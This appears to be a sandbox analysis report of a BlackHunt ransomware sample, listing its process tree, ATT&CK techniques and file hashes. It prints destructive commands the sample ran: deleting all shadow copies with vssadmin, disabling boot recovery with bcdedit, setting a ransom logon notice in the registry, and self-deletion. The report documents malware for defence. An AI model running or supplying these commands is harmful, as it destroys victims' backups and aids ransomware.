C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:10364
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:11272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:10652
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:11332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:10808 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:10336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10336 -s 14564⤵
- Program crash
PID:11548
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe"2⤵PID:10848
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:11248
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:1072
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5916
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8372
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:7268
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:14104
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3152
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1680
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:1440
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:7248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 10336 -ip 103361⤵PID:11508
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51cac50e59d713751b8dba940a355ee5c
SHA1b4bf32fb77a3d3d77a300aa72d9bd717d7e59285
SHA256efaaa07a195afce1ac820526d2055d05368d6493bd1a5ee3756b15c7c7826902
SHA5124095bcdfe177307614ad84cb3ea23f325df8cb9e93ef27757b8c4313ff24d43b46e5680ab48bd85772916adf3fede1581c2c37bbbeb8a4b92dbb7d4fc27f9ed5
-
Filesize
12KB
MD5815d18e17ac0e46d875f5477e70da842
SHA1ddf7a707cbb541ff199ca3019739a4adb2422ab7
SHA2568fe36d54e3440e31a954918f1112ddd7024b8a5a76549ee86e86ece5223f6512
SHA512921da84815c5519dcce3d426d51c5c6ccf0a96d7db83e42f24575dcacd528d4569b1170d86bbebfd31356e5fc4def16a5355359f078aa81736b543ead698669f
-
Filesize
684B
MD57a73306cf37e28c06d5e763d971468d0
SHA1502e3818fe5497b4392da84ed110ddf1ba9faf98
SHA256f0d4da6e77ca619c59576edd294f45b56c527bcd07500573d39075cfcfdf9abd
SHA512da9ec33636a1e71f9c452413faf366085ca91cdd59c069fdbd4e937751271966059f6e8febe1f52e8e5c557f15d6042570d6b7cadd4c120c48f8d8db2e5c7733